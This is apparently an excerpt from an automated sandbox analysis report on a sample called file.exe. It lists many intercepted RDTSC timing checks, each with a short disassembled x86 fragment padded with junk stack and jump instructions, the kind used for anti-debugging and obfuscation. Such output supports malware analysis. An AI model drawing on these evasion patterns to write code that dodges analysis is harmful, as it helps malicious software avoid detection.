Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D25847 second address: D25855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F0674F129A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D257D6 second address: D257EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674CEBDFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D25DB3 second address: D25DCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F0674F129A6h 0x00000009 jl 00007F0674F129A6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007F0674F129A6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26040 second address: D26044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26044 second address: D0DB38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F0674F129B6h 0x0000000c nop 0x0000000d lea eax, dword ptr [ebp+1247692Ch] 0x00000013 sub ecx, dword ptr [ebp+122D2BE2h] 0x00000019 push eax 0x0000001a pushad 0x0000001b push ecx 0x0000001c jmp 00007F0674F129B1h 0x00000021 pop ecx 0x00000022 jc 00007F0674F129B2h 0x00000028 jmp 00007F0674F129ACh 0x0000002d popad 0x0000002e mov dword ptr [esp], eax 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F0674F129A8h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b call dword ptr [ebp+122D36B8h] 0x00000051 push ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D61EA7 second address: D61EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D61EAB second address: D61EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D61EB1 second address: D61EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F0674CEBDF8h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6201B second address: D62023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D62023 second address: D62042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0674CEBE04h 0x00000009 popad 0x0000000a push edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D62306 second address: D6234B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674F129AAh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jc 00007F0674F129A6h 0x00000014 popad 0x00000015 pop ebx 0x00000016 pushad 0x00000017 pushad 0x00000018 jmp 00007F0674F129B9h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f jng 00007F0674F129A6h 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a push esi 0x0000002b pop esi 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D624B8 second address: D624BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6261A second address: D62620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D68227 second address: D6822B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6822B second address: D6823B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F0674F129ACh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6823B second address: D68245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D68245 second address: D6824E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6824E second address: D68279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F0674CEBDFDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F0674CEBE05h 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67152 second address: D6715C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6715C second address: D67162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67162 second address: D6716B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6716B second address: D67175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0674CEBDF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6768E second address: D67692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D66D84 second address: D66D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67AD9 second address: D67ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67ADD second address: D67B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0674CEBE09h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jne 00007F0674CEBE24h 0x00000012 pushad 0x00000013 jbe 00007F0674CEBDF6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6B398 second address: D6B3A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6B3A0 second address: D6B3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6B3A5 second address: D6B3AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6B3AB second address: D6B3AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6B3AF second address: D6B3B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6B3B9 second address: D6B3BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6B3BF second address: D6B3C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6B3C3 second address: D6B3E5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0674CEBDF6h 0x00000008 jp 00007F0674CEBDF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F0674CEBDF6h 0x0000001c ja 00007F0674CEBDF6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6B3E5 second address: D6B400 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0674F129A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0674F129AFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6B400 second address: D6B411 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0674CEBDFBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6B411 second address: D6B417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D74A91 second address: D74A95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7A3AE second address: D7A3DA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 jmp 00007F0674F129B0h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0674F129B0h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7A3DA second address: D7A3DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7A56E second address: D7A577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7A577 second address: D7A581 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0674CEBDF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7A581 second address: D7A587 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7A587 second address: D7A59E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0674CEBDFFh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7A59E second address: D7A5A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7A848 second address: D7A84C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7A9A5 second address: D7A9C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0674F129B6h 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE8D3D second address: CE8D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0674CEBDFCh 0x00000009 jmp 00007F0674CEBE03h 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D25AE2 second address: D25AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7AB06 second address: D7AB14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F0674CEBDF8h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7AB14 second address: D7AB19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7AB19 second address: D7AB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0674CEBE04h 0x00000009 jmp 00007F0674CEBDFDh 0x0000000e jbe 00007F0674CEBDF6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0674CEBE08h 0x0000001c jnp 00007F0674CEBDF6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7AB65 second address: D7AB69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7AB69 second address: D7AB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7B70A second address: D7B710 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7B710 second address: D7B748 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0674CEBDF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e jns 00007F0674CEBDF6h 0x00000014 jmp 00007F0674CEBE09h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jp 00007F0674CEBDF6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7EA30 second address: D7EA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E729 second address: D7E735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E735 second address: D7E757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674F129AAh 0x00000007 js 00007F0674F129A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push ecx 0x00000012 jnl 00007F0674F129A6h 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E757 second address: D7E75B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E75B second address: D7E772 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F0674F129ABh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E772 second address: D7E776 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8275C second address: D82760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D82760 second address: D827AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674CEBDFCh 0x00000007 jnp 00007F0674CEBDF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F0674CEBE09h 0x00000015 jmp 00007F0674CEBDFDh 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jmp 00007F0674CEBDFAh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D827AE second address: D827B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D827B3 second address: D827BA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81F00 second address: D81F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D821D4 second address: D821DE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0674CEBDFEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D821DE second address: D821E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D821E7 second address: D821EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8234E second address: D8236B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0674F129B3h 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F0674F129A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D898CE second address: D898D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D898D4 second address: D898F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0674F129B9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D898F6 second address: D898FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D87C63 second address: D87C79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F0674F129A6h 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e jne 00007F0674F129AEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D87EF8 second address: D87EFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D88FC1 second address: D88FE4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0674F129A6h 0x00000008 jmp 00007F0674F129B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D89621 second address: D8963E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0674CEBDFFh 0x0000000b jnp 00007F0674CEBDFCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8963E second address: D89654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jno 00007F0674F129A8h 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F0674F129A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D89654 second address: D89658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D89658 second address: D8965E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D929FE second address: D92A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9246C second address: D92486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0674F129B0h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D92486 second address: D924AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0674CEBE07h 0x00000009 jmp 00007F0674CEBDFCh 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9D583 second address: D9D59F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0674F129B8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9BA7B second address: D9BA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9BA81 second address: D9BA87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9BA87 second address: D9BAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop edx 0x00000009 jc 00007F0674CEBE10h 0x0000000f jmp 00007F0674CEBE04h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9BF2B second address: D9BF31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9BF31 second address: D9BF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9C084 second address: D9C0A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F0674F129B0h 0x00000011 pushad 0x00000012 popad 0x00000013 jnl 00007F0674F129A6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9C0A9 second address: D9C0CE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0674CEBE09h 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F0674CEBDF6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9C0CE second address: D9C0E5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0674F129A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F0674F129A6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9C0E5 second address: D9C0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9C0E9 second address: D9C0EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9C0EF second address: D9C10F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0674CEBE07h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
